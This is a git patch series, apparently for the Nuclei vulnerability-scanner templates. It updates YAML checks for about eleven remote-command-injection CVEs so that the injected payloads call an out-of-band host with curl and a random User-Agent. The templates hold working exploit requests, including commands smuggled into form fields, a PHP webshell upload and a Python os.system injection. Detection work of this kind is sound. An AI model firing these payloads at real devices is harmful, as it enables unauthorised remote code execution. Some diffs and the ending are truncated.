From d5160b17781b41a060c28a5cabf014ef0625dec3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Mar 2023 12:09:20 +0530 Subject: [PATCH 01/15] Update CVE-2021-20038.yaml --- cves/2021/CVE-2021-20038.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-20038.yaml b/cves/2021/CVE-2021-20038.yaml index 715965bd7a..96fe0ef47c 100644 --- a/cves/2021/CVE-2021-20038.yaml +++ b/cves/2021/CVE-2021-20038.yaml @@ -19,7 +19,7 @@ info: requests: - raw: - | - GET /{{prefix_addr}}{{system_addr}};{wget,http://{{interactsh-url}}};{{prefix_addr}}{{system_addr}};{wget,http://{{interactsh-url}}};?{{repeat("A", 518)}} HTTP/1.1 + GET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'};?{{repeat("A", 518)}} HTTP/1.1 Host: {{Hostname}} attack: clusterbomb @@ -30,10 +30,16 @@ requests: - "%08%b7%06%08" # for 10.2.1.2-24sv - "%64%b8%06%08" # for 10.2.1.1-1[79]sv + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: {{rand_base(6)}}" + # Enhanced by mp on 2022/04/29 From 221b69c8cb54f6e64e7e05b9073d368d4a1e740a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Mar 2023 15:31:08 +0530 Subject: [PATCH 02/15] added addtional matcher --- cves/2020/CVE-2020-28188.yaml | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index ef78a1e202..a627f79476 100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml @@ -20,17 +20,24 @@ info: requests: - raw: - | - GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 + GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'%60 HTTP/1.1 Host: {{Hostname}} - | - GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 + GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'%60 HTTP/1.1 Host: {{Hostname}} + stop-at-first-match: true + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: {{rand_base(6)}}" + # Enhanced by mp on 2022/03/27 From eb4de2bf7df5bf35312d4169ee68833f3121e12c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Mar 2023 15:33:28 +0530 Subject: [PATCH 03/15] added additional matcher --- cves/2021/CVE-2021-41653.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-41653.yaml b/cves/2021/CVE-2021-41653.yaml index bbc4fdbe67..be352b0d97 100644 --- a/cves/2021/CVE-2021-41653.yaml +++ b/cves/2021/CVE-2021-41653.yaml @@ -30,7 +30,7 @@ requests: dataBlockSize=64 timeout=1 numberOfRepetitions=4 - host=$(echo 127.0.0.1; wget http://{{interactsh-url}}) + host=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}') X_TP_ConnName=ewan_ipoe_d diagnosticsState=Requested @@ -43,10 +43,16 @@ requests: [ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0 + matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: {{rand_base(6)}}" + # Enhanced by mp on 2022/02/27 From 2dba919ec21f73b8ab56ef8cd34ad063d576dd22 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Mar 2023 15:40:35 +0530 Subject: [PATCH 04/15] added matcher and useragent --- cves/2021/CVE-2021-36356.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-36356.yaml b/cves/2021/CVE-2021-36356.yaml index 282163136b..c996b2f247 100644 --- a/cves/2021/CVE-2021-36356.yaml +++ b/cves/2021/CVE-2021-36356.yaml @@ -27,13 +27,19 @@ requests: radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php - | - GET /{{randstr}}.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http://{{interactsh-url}}%22)%7D' HTTP/1.1 + GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute("curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'")}' HTTP/1.1 Host: {{Hostname}} + matchers-condition: and matchers: - type: word - part: interactsh_protocol + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: {{rand_base(6)}}" + # Enhanced by mp on 2022/05/18 From 1f980803939cc7f79dd206e97571c6b43048f35a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Mar 2023 15:43:50 +0530 Subject: [PATCH 05/15] added additional matcher --- cves/2018/CVE-2018-10562.yaml | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/cves/2018/CVE-2018-10562.yaml b/cves/2018/CVE-2018-10562.yaml index fe4ea6bae0..89698f4ce8 100644 --- a/cves/2018/CVE-2018-10562.yaml +++ b/cves/2018/CVE-2018-10562.yaml @@ -23,19 +23,25 @@ requests: POST /GponForm/diag_Form?images/ HTTP/1.1 Host: {{Hostname}} - XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wget http://{{interactsh-url}}`;busybox wget http://{{interactsh-url}}&ipv=0 + XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'`;busybox wget http://{{interactsh-url}}&ipv=0 - | POST /GponForm/diag_Form?images/ HTTP/1.1 Host: {{Hostname}} - XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://{{interactsh-url}}`;wget http://{{interactsh-url}}&ipv=0 + XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'`;wget http://{{interactsh-url}}&ipv=0 stop-at-first-match: true + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: {{rand_base(6)}}" + # Enhanced by mp on 2022/05/12 From 788b24b9e54e0dcc49003e6913a2ca45c48b8b3c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Mar 2023 15:47:09 +0530 Subject: [PATCH 06/15] added additional matcher --- cves/2020/CVE-2020-17456.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-17456.yaml b/cves/2020/CVE-2020-17456.yaml index fba91c11a2..f631f02460 100644 --- a/cves/2020/CVE-2020-17456.yaml +++ b/cves/2020/CVE-2020-17456.yaml @@ -31,7 +31,7 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;wget http://{{interactsh-url}}&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 + Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 cookie-reuse: true matchers-condition: and @@ -41,6 +41,11 @@ requests: words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: {{rand_base(6)}}" + - type: word part: header words: From 781db94338e8ecd1e887cd3e1e7f0e2702b6530c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Mar 2023 15:48:20 +0530 Subject: [PATCH 07/15] added additional matcher --- cves/2020/CVE-2020-28871.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-28871.yaml b/cves/2020/CVE-2020-28871.yaml index 1d08b57be1..ae16e2387b 100644 --- a/cves/2020/CVE-2020-28871.yaml +++ b/cves/2020/CVE-2020-28871.yaml @@ -34,7 +34,7 @@ requests: Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php" Content-Type: image/gif - GIF89a213213123 Date: Wed, 29 Mar 2023 15:49:41 +0530 Subject: [PATCH 08/15] added additional matcher --- cves/2020/CVE-2020-25506.yaml | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml index c9c34af0e6..ea7bab4c23 100644 --- a/cves/2020/CVE-2020-25506.yaml +++ b/cves/2020/CVE-2020-25506.yaml @@ -23,17 +23,23 @@ requests: Host: {{Hostname}} Accept: */* - C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` + C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'` - | - POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1 + POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'` HTTP/1.1 Host: {{Hostname}} Accept: */* + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: {{rand_base(6)}}" + # Enhanced by mp on 2022/03/27 From 46591125182ee2c41cacdec688ff511f2052710e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Mar 2023 15:51:17 +0530 Subject: [PATCH 09/15] added additional matcher --- cves/2018/CVE-2018-10818.yaml | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml index af6bee0a00..0290f53805 100644 --- a/cves/2018/CVE-2018-10818.yaml +++ b/cves/2018/CVE-2018-10818.yaml @@ -20,24 +20,26 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - &uid=10; wget http://{{interactsh-url}} + &uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}' - | POST /en/php/usb_sync.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - &act=sync&task_number=1;wget http://{{interactsh-url}} + &act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}' + stop-at-first-match: true matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - type: status - status: - - 200 + - type: word + part: interactsh_request + words: + - "User-Agent: {{rand_base(6)}}" # Enhanced by mp on 2022/04/26 From 38870df9a64a7cd9938cabcdfd638e52fde9ec68 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Mar 2023 15:52:44 +0530 Subject: [PATCH 10/15] added additional matcher --- cves/2021/CVE-2021-21881.yaml | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-21881.yaml b/cves/2021/CVE-2021-21881.yaml index 1e36958c23..8438fb6d33 100644 --- a/cves/2021/CVE-2021-21881.yaml +++ b/cves/2021/CVE-2021-21881.yaml @@ -23,7 +23,7 @@ requests: Authorization: Basic dXNlcjp1c2Vy Content-Type: application/x-www-form-urlencoded - ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; wget http://{{interactsh-url}} # + ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}' # - | POST / HTTP/1.1 @@ -31,12 +31,19 @@ requests: Authorization: Basic YWRtaW46UEFTUw== Content-Type: application/x-www-form-urlencoded - ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; wget http://{{interactsh-url}} # + ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}' # + stop-at-first-match: true + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: {{rand_base(6)}}" + # Enhanced by mp on 2022/05/05 From 5d358a40397dffcdee5d8e8d35f92ee5792f9d87 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Mar 2023 15:57:31 +0530 Subject: [PATCH 11/15] added additional matcher --- cves/2021/CVE-2021-1497.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml index d879c8c812..fe0cfdcbf7 100644 --- a/cves/2021/CVE-2021-1497.yaml +++ b/cves/2021/CVE-2021-1497.yaml @@ -28,7 +28,7 @@ requests: Accept: */* Content-Type: application/x-www-form-urlencoded - username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}} + username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'\");print(crypt.crypt(\"')}} - | POST /auth HTTP/1.1 @@ -36,16 +36,18 @@ requests: Accept: */* Content-Type: application/x-www-form-urlencoded - username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}} + username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'\");print(crypt.crypt(\"')}} matchers-condition: and matchers: - - type: status - status: - - 200 - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: {{rand_base(6)}}" + # Enhanced by mp on 2022/04/29 From a037cb0204a523538959eabe2884e758cee8134a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Mar 2023 16:37:38 +0530 Subject: [PATCH 12/15] requested changes made --- cves/2018/CVE-2018-10562.yaml | 9 ++++++--- cves/2018/CVE-2018-10818.yaml | 9 ++++++--- cves/2020/CVE-2020-17456.yaml | 7 +++++-- cves/2020/CVE-2020-25506.yaml | 9 ++++++--- cves/2020/CVE-2020-28188.yaml | 9 ++++++--- cves/2020/CVE-2020-28871.yaml | 7 +++++-- cves/2021/CVE-2021-1497.yaml | 9 ++++++--- cves/2021/CVE-2021-20038.yaml | 7 +++++-- cves/2021/CVE-2021-21881.yaml | 9 ++++++--- cves/2021/CVE-2021-36356.yaml | 7 +++++-- cves/2021/CVE-2021-41653.yaml | 7 +++++-- 11 files changed, 61 insertions(+), 28 deletions(-) diff --git a/cves/2018/CVE-2018-10562.yaml b/cves/2018/CVE-2018-10562.yaml index 89698f4ce8..a8a7b30bc8 100644 --- a/cves/2018/CVE-2018-10562.yaml +++ b/cves/2018/CVE-2018-10562.yaml @@ -17,19 +17,22 @@ info: cwe-id: CWE-78 tags: cve,cve2018,dasan,gpon,rce,oast,kev +variables: + base: '{{rand_base(6)}}' + requests: - raw: - | POST /GponForm/diag_Form?images/ HTTP/1.1 Host: {{Hostname}} - XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'`;busybox wget http://{{interactsh-url}}&ipv=0 + XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'`;busybox wget http://{{interactsh-url}}&ipv=0 - | POST /GponForm/diag_Form?images/ HTTP/1.1 Host: {{Hostname}} - XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'`;wget http://{{interactsh-url}}&ipv=0 + XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'`;wget http://{{interactsh-url}}&ipv=0 stop-at-first-match: true matchers-condition: and @@ -42,6 +45,6 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{rand_base(6)}}" + - "User-Agent: {{base}}" # Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml index 0290f53805..a3c191a56c 100644 --- a/cves/2018/CVE-2018-10818.yaml +++ b/cves/2018/CVE-2018-10818.yaml @@ -13,6 +13,9 @@ info: cve-id: CVE-2018-10818 tags: cve,cve2018,lg-nas,rce,oast,injection +variables: + base: '{{rand_base(6)}}' + requests: - raw: - | @@ -20,14 +23,14 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - &uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}' + &uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{base}}' - | POST /en/php/usb_sync.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - &act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}' + &act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{base}}' stop-at-first-match: true matchers-condition: and @@ -40,6 +43,6 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{rand_base(6)}}" + - "User-Agent: {{base}}" # Enhanced by mp on 2022/04/26 diff --git a/cves/2020/CVE-2020-17456.yaml b/cves/2020/CVE-2020-17456.yaml index f631f02460..bd364bde5b 100644 --- a/cves/2020/CVE-2020-17456.yaml +++ b/cves/2020/CVE-2020-17456.yaml @@ -16,6 +16,9 @@ info: cwe-id: CWE-78 tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve +variables: + base: '{{rand_base(6)}}' + requests: - raw: - | @@ -31,7 +34,7 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 + Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 cookie-reuse: true matchers-condition: and @@ -44,7 +47,7 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{rand_base(6)}}" + - "User-Agent: {{base}}" - type: word part: header diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml index ea7bab4c23..31d960594d 100644 --- a/cves/2020/CVE-2020-25506.yaml +++ b/cves/2020/CVE-2020-25506.yaml @@ -16,6 +16,9 @@ info: cwe-id: CWE-78 tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev +variables: + base: '{{rand_base(6)}}' + requests: - raw: - | @@ -23,10 +26,10 @@ requests: Host: {{Hostname}} Accept: */* - C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'` + C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{base}}'` - | - POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'` HTTP/1.1 + POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{base}}'` HTTP/1.1 Host: {{Hostname}} Accept: */* @@ -40,6 +43,6 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{rand_base(6)}}" + - "User-Agent: {{base}}" # Enhanced by mp on 2022/03/27 diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index a627f79476..a3359eb1bf 100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml @@ -17,14 +17,17 @@ info: cwe-id: CWE-78 tags: cve,cve2020,terramaster,rce,oast,mirai,unauth +variables: + base: '{{rand_base(6)}}' + requests: - raw: - | - GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'%60 HTTP/1.1 + GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'%60 HTTP/1.1 Host: {{Hostname}} - | - GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{rand_base(6)}}'%60 HTTP/1.1 + GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'%60 HTTP/1.1 Host: {{Hostname}} stop-at-first-match: true @@ -38,6 +41,6 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{rand_base(6)}}" + - "User-Agent: {{base}}" # Enhanced by mp on 2022/03/27 diff --git a/cves/2020/CVE-2020-28871.yaml b/cves/2020/CVE-2020-28871.yaml index ae16e2387b..d26a507975 100644 --- a/cves/2020/CVE-2020-28871.yaml +++ b/cves/2020/CVE-2020-28871.yaml @@ -16,6 +16,9 @@ info: cwe-id: CWE-434 tags: cve2020,monitorr,rce,oast,unauth,edb,cve,fileupload,intrusive +variables: + base: '{{rand_base(6)}}' + requests: - raw: - | @@ -34,7 +37,7 @@ requests: Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php" Content-Type: image/gif - GIF89a213213123 Date: Wed, 29 Mar 2023 19:24:19 +0530 Subject: [PATCH 13/15] update variable name --- cves/2018/CVE-2018-10562.yaml | 8 ++++---- cves/2018/CVE-2018-10818.yaml | 8 ++++---- cves/2020/CVE-2020-17456.yaml | 6 +++--- cves/2020/CVE-2020-25506.yaml | 8 ++++---- cves/2020/CVE-2020-28188.yaml | 8 ++++---- cves/2020/CVE-2020-28871.yaml | 6 +++--- cves/2021/CVE-2021-1497.yaml | 8 ++++---- cves/2021/CVE-2021-20038.yaml | 6 +++--- cves/2021/CVE-2021-21881.yaml | 8 ++++---- cves/2021/CVE-2021-36356.yaml | 6 +++--- cves/2021/CVE-2021-41653.yaml | 6 +++--- 11 files changed, 39 insertions(+), 39 deletions(-) diff --git a/cves/2018/CVE-2018-10562.yaml b/cves/2018/CVE-2018-10562.yaml index a8a7b30bc8..e638d7ca87 100644 --- a/cves/2018/CVE-2018-10562.yaml +++ b/cves/2018/CVE-2018-10562.yaml @@ -18,7 +18,7 @@ info: tags: cve,cve2018,dasan,gpon,rce,oast,kev variables: - base: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: @@ -26,13 +26,13 @@ requests: POST /GponForm/diag_Form?images/ HTTP/1.1 Host: {{Hostname}} - XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'`;busybox wget http://{{interactsh-url}}&ipv=0 + XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0 - | POST /GponForm/diag_Form?images/ HTTP/1.1 Host: {{Hostname}} - XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'`;wget http://{{interactsh-url}}&ipv=0 + XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0 stop-at-first-match: true matchers-condition: and @@ -45,6 +45,6 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{base}}" + - "User-Agent: {{useragent}}" # Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml index a3c191a56c..f157cb4167 100644 --- a/cves/2018/CVE-2018-10818.yaml +++ b/cves/2018/CVE-2018-10818.yaml @@ -14,7 +14,7 @@ info: tags: cve,cve2018,lg-nas,rce,oast,injection variables: - base: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: @@ -23,14 +23,14 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - &uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{base}}' + &uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' - | POST /en/php/usb_sync.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - &act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{base}}' + &act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' stop-at-first-match: true matchers-condition: and @@ -43,6 +43,6 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{base}}" + - "User-Agent: {{useragent}}" # Enhanced by mp on 2022/04/26 diff --git a/cves/2020/CVE-2020-17456.yaml b/cves/2020/CVE-2020-17456.yaml index bd364bde5b..83e03db640 100644 --- a/cves/2020/CVE-2020-17456.yaml +++ b/cves/2020/CVE-2020-17456.yaml @@ -17,7 +17,7 @@ info: tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve variables: - base: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: @@ -34,7 +34,7 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 + Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 cookie-reuse: true matchers-condition: and @@ -47,7 +47,7 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{base}}" + - "User-Agent: {{useragent}}" - type: word part: header diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml index 31d960594d..f35292e9bf 100644 --- a/cves/2020/CVE-2020-25506.yaml +++ b/cves/2020/CVE-2020-25506.yaml @@ -17,7 +17,7 @@ info: tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev variables: - base: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: @@ -26,10 +26,10 @@ requests: Host: {{Hostname}} Accept: */* - C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{base}}'` + C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` - | - POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{base}}'` HTTP/1.1 + POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1 Host: {{Hostname}} Accept: */* @@ -43,6 +43,6 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{base}}" + - "User-Agent: {{useragent}}" # Enhanced by mp on 2022/03/27 diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index a3359eb1bf..0b09578f43 